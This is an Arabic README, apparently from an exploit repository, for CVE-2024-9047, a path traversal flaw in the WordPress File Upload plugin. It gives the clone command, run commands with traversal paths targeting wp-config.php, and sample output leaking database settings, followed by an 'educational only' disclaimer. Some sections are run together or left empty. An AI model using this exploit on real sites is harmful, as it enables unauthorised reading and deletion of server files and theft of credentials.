
استغلال لـ WordPress File Upload Plugin - جميع الإصدارات حتى 4.24.11 معرضة للخطر.
إن إضافة WordPress File Upload لووردبريس معرضة لثغرة من نوع اجتياز المسار (Path Traversal) في جميع الإصدارات حتى 4.24.11 وذلك عبر ملف wfu_file_downloader.php. تسمح هذه الثغرة للمهاجمين غير المصادقين بقراءة أو حذف ملفات خارج الدليل المقصود. يتطلب الاستغلال الناجح أن يكون تثبيت ووردبريس المستهدف يعمل على إصدار PHP 7.4 أو أقدم.
يمكن للمهاجم استغلال هذه الثغرة عن طريق صياغة طلب معين إلى نقطة النهاية الضعيفة wfu_file_downloader.php، والتلاعب بمعامل مسار الملف للحصول على وصول غير مصرح به إلى ملفات حساسة على الخادم.
4.24.11 أو أقدم).7.4 أو أقدم.استنساخ هذا المستودع:
git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
cd CVE-2024-9047-Exploit
تثبيت تبعيات بايثون (إذا لزم الأمر):
pip install requests
تشغيل البرنامج النصي للتحقق من إصدار الإضافة واستغلال الثغرة:
python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
لاستغلال التهيئة الضعيفة الافتراضية وقراءة ملف تهيئة ووردبريس:
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
/** Database username */
define( 'DB_USER', 'root' );
/** Database password */
define( 'DB_PASSWORD', '' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
لحماية موقع ووردبريس الخاص بك:
هذا الكود مخصص للأغراض التعليمية والبحثية فقط. الاستخدام غير المصرح به لهذا البرنامج النصي على أنظمة لا تمتلكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي. لا يتحمل المؤلفون أي مسؤولية عن أي إساءة استخدام لهذا الكود.